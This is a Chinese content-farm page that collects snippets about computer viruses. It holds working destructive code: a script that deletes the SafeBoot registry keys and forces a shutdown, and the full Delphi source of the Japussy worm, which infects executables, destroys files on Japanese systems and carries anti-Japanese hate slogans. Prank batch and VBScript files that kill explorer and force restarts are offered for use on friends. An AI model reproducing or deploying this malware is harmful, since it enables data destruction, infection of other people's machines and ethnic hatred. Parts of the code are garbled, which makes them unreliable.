删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworksr.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSRService”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkStreams Drivers”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSystem Bus Extender”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkTcpip”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkTDI”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpipe.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdtcp.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkermservice”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkvga.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkvgasave.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkWinMgmt”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkWZCSVC”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNdisuio”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBoot”)
关机:
关闭系统 (2, 假)
关机2:
运行(“shutdown -s -f ”)
以上是读文网小编给朋友们做出的总结!希望对你们有帮助!
看了“最简单的电脑病毒代码是什么”文章的还看了:
浏览量:2
下载量:0
时间:
恶意代码危害是非常严重的,病毒危害也差不多,那么到底什么是恶意代码和病毒呢?下面由读文网小编给你做出详细的恶意代码和病毒介绍!希望对你有帮助!
是一种可以自我复制的完全独立的程序,它的传播不需要借助被感染主机中的其他程序。蠕虫的自我复制不象其他的病毒,它可以自动创建与它的功能完全相同的副本,并在没人干涉的情况下自动运行。蠕虫是通过系统存在的漏洞和设置的不安全性(例如:设置共享)来进行入侵的。它的自身特性可以使它以及快的速度传输(在几秒中内从地球的一端传送到另一端)。其中比较典型的有Blaster和SQL Slammer。
浏览量:2
下载量:0
时间:
恶意代码是构成病毒的主要因素,我们要怎么样才能防护恶意代码清除点病毒呢?下面由读文网小编给你做出详细的防护恶意代码清除电脑病毒方法介绍!希望对你有帮助!
问题揭示
我们来看看wincfg.Exe是如何下载到浏览者计算机上的,在该网页上点击鼠标右键,选择其中的“查看源代码”,在网页代码最后面发现了可疑的语句
看了“怎么样防护恶意代码清除电脑病毒”文章的还看了:
浏览量:2
下载量:0
时间:
对于电脑病毒代码,你并不陌生吧?危害着我们电脑!下面由读文网小编给你做出详细的电脑病毒代码说法介绍!希望对你有帮助!
编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码被称为计算机病毒,具有破坏性,复制性和传染性。 由人编制而成的一段程序。 组成包括,潜伏机制,传染机制,触发机制。
浏览量:2
下载量:0
时间:
万恶的计算机病毒也是有源代码组成的,那么计算机病毒代码长什么样呢?下面由读文网小编给你做出详细的计算机病毒源代码介绍!希望对你有帮助!
把下面这段代码复制到记事本里,保存为文本文件
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
熊猫烧香
ogram Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = $12EB8; //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //PE文件主图标的大小--744字节
IconTail = IconOffset + IconSize; //PE文件主图标的尾部
ID = $44444444; //感染标记
//垃圾码,以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //函数声明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之?
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出错则文件正在被使用,退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //检查PE文件头
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
begin
IsPE := True; //是PE文件
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //检查感染标记
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
Exit;
IcoStream := TMemoryStream.Create;
DstStream := TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
//得到被感染文件的主图标(744字节),存入流
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
//头文件
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
//写入病毒体主图标之前的数据
CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
//写入目前程序的主图标
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
//写入病毒体主图标到病毒体尾部之间的数据
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
//写入宿主程序
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//写入已感染的标记
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); //替换宿主文件
DstStream.Free;
end;
except;
end;
end;
{ 将目标文件写入垃圾码后删除 }
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //去掉只读属性
FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
try
Size := GetFileSize(FileHandle, nil); //文件大小
i := 0;
Randomize;
Max := Random(15); //写入垃圾码的随机次数
if Max < 5 then
Max := 5;
Mass := Size div Max; //每个间隔块的大小
Len := Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0); //定位
//写入垃圾码,将文件彻底破坏掉
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClose(FileHandle); //关闭文件
end;
DeleteFile(PChar(FileName)); //删除之
except
end;
end;
{ 获得可写的驱动器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //遍历26个字母
begin
D := Chr(i + 65);
Str := D + ':';
DiskType := GetDriveType(PChar(Str));
//得到本地磁盘和网络盘
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ 遍历目录,感染和摧毁文件 }
procedure LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr '.') and
(SearchRec.Name <> '..') then
Result := 0 //不是目录
else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 1 //不是根目录
else Result := 2; //是根目录
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then
begin
InfectOneFile(Fn); //感染可执行文件
end
else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//感染HTML和ASP文件,将Base64编码后的病毒写入
//感染浏览此网页的所有用户
//哪位大兄弟愿意完成之?
end
else if Ext = '.WAB' then //Outlook地址簿文件
begin
//获取Outlook邮件地址
end
else if Ext = '.ADC' then //Foxmail地址自动完成文件
begin
//获取Foxmail邮件地址
end
else if Ext = 'IND' then //Foxmail地址簿文件
begin
//获取Foxmail邮件地址
end
else
begin
if IsJap then //是倭文操作系统
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
Sleep(200);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings + '', Mask);
FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procedure InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系统
IsJap := True; //去死吧!
DriverList := GetDrives; //得到可写的磁盘列表
Len := Length(DriverList);
while True do //死循环
begin
for i := Len downto 1 do //遍历每个磁盘驱动器
LoopFiles(DriverList + ':', '*.*'); //感染之
SendMail; //发带毒邮件
Sleep(1000 * 60 * 5); //睡眠5分钟
end;
end;
{ 主程序开始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
else //WinNT
begin
//远程线程映射到Explorer进程
//哪位兄台愿意完成之?
end;
//如果是原始病毒体自己
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
InfectFiles //感染和发邮件
else //已寄生于宿主程序上了,开始工作
begin
TmpFile := ParamStr(0); //创建临时文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格
ExtractFile(TmpFile); //分离之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //创建新进程运行之
InfectFiles; //感染和发邮件
end;
看了“计算机病毒源代码什么样”文章的还看了:
浏览量:3
下载量:0
时间:
有时候想和朋友们玩玩,搞点恶搞电脑病毒给他们,要怎么办呢?下面由读文网小编给你做出详细的恶搞电脑病毒代码介绍!希望对你有帮助!
新建一个文本文档(.txt),要复制以下代码:
@echo off
color 4
tskill explorer
echo .
echo .
echo .
echo .
echo 警告:在病毒执行期间禁止关闭电源,
echo 否则你就和你心爱的电脑说
echo .
echo . BYE-BYE
echo .
echo Computer system crash!
echo .
echo .
echo I am a virus, my name is Ghost.
echo 我是魔鬼病毒,在这个堕落的世界上苏醒了。
echo .
echo . Warning! CPU has been changed please re-enter CPU settings
echo. in the CMOS setuo and remember to save before quit.
echo. Secondary IDE channel no 80 conductor cable installed.
set /p select=:)
if "%select%"=="" goto start
:start
shutdown -r -t 10 -c "您的计算机上带有魔鬼病毒,今天是它的发作日期。病毒已经破坏了您的系统,您的计算机将在10秒钟后重启。"
::结束
再另存为:名字.bat 你要记住"名字"后面要加".bat"
就可以了,没有任何破坏性,吓吓人。
你可以试试看看效果。
看了“恶搞电脑病毒代码有哪些”文章的还看了:
浏览量:3
下载量:0
时间:
恶搞代码和电脑病毒是有很大区别的!那么它们的区别是什么呢?下面由读文网小编给你做出详细的恶搞代码和病毒区别介绍!希望对你有帮助!
恶意插件,指的是安装在被安装者电脑中的恶意软件,能够强迫被安装的电脑执行制定的操作,导致个人财产损失。病毒则需要具有固定的发作动作、发作条件等,并且相对于恶意插件来说破坏得更加严重。
木马则需要使用指定的载体进入到被感染的计算机,并且会释放载体之外的文件,一般还具有自我销毁功能。
因此,计算机如果感染了病毒,可以通过升级杀毒软件进行杀毒解决问题;如果感染了木马,也可以通过专杀工具进行查杀;如果感染了恶意插件,则建议直接重新安装系统,此类插件较难清除。
浏览量:3
下载量:0
时间:
计算机病毒也是要生成的,那么计算机病毒代码有些什么呢?下面由读文网小编给你做出详细的计算机病毒代码介绍!希望对你有帮助!
给你个恶搞的玩on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,true
dim a
do while(a <> "我是猪")
a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"
浏览量:6
下载量:0
时间:
计算机源病毒代码是怎么样的呢?跟着小编去看看吧!下面由读文网小编给你做出详细的计算机病毒源代码介绍!希望对你有帮助!
病毒测试代码:
欧洲计算机防病毒协会提供的测试病毒代码。本代码尽管测试,无任何危险。
请复制下面的代码到文本中保存
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
请复制上面的代码到文本中保存
测试方法:
1.鼠标右键点击桌面空白处,创建一个“文本文档”。
2.将上面这段测试代码复制到“文本”里,保存,然后可以直接右键点击这个文本,用杀毒软件扫描也可以等一会,如果你的杀毒软件还行,会自动报毒并将该文本删除那就可以初步放心了。
测试原理:
该段代码是欧洲计算机防病毒协会开发的一种病毒代码,其中的特征码已经包含在各种杀毒软件的病毒代码库里,所以可以用做测试病毒扫描引擎。
测试等级:
特等:复制完代码后便提示内存有病毒
优等:刚保存完就提示病毒(或者直接删除)
中等:保存后几秒提示病毒(或者直接删除)
下等:需自己启动病毒扫描查杀才提示病毒(或者直接删除)
看了“计算机病毒源代码怎么样 ”文章的还看了:
浏览量:3
下载量:0
时间: